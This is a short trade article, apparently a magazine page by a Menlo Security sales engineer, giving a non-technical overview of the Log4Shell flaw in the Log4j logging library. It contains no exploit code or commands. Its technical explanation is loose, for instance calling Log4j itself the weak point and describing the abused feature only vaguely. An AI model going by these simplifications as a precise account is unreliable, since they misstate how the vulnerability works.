Analysing the true threat of Log4j


            By Tom McVey, Sales Engineer EMEA, Menlo Security



            In December 2021 the cybersecurity industry could be found reflecting on another difficult year, defined
            by further spikes in both the sophistication and volume of threats used by attackers.

            Following on from a similar pattern in 2020, attackers continued to capitalise on growing digital footprints
            and new vulnerabilities – a trend that has only continued to accelerate since the pandemic first induced
            a rapid increase in digitalisation efforts.
            Amidst  such  reflections,  Log4Shell  emerged  as  one  of  the  most  threatening  vulnerabilities  facing
            companies to date.

            Log4j is a weak point that was discovered in the Log4j Java logging library (CVE-2021-44228). It is a
            widespread  piece  of  software  typically  used  to  record  events  such  as  errors  and  routine  system
            operations. The 404 error message that is received when clicking on a bad link is one such example of
            Log4j in action, both telling the user that the webpage doesn’t exist and recording the event in a log.

            Log4Shell works by abusing a specific feature in Log4j that allows users to specify custom code for
            formatting a log message. The challenge lies in the fact that this code can be used for more than just
            formatting  log  messages.  Indeed,  Log4j  allows  third-party  servers  to  submit  software  code  that  can
            perform all kinds of actions on the targeted computer, opening the door to a range of nefarious activities.












































                                                                                                            115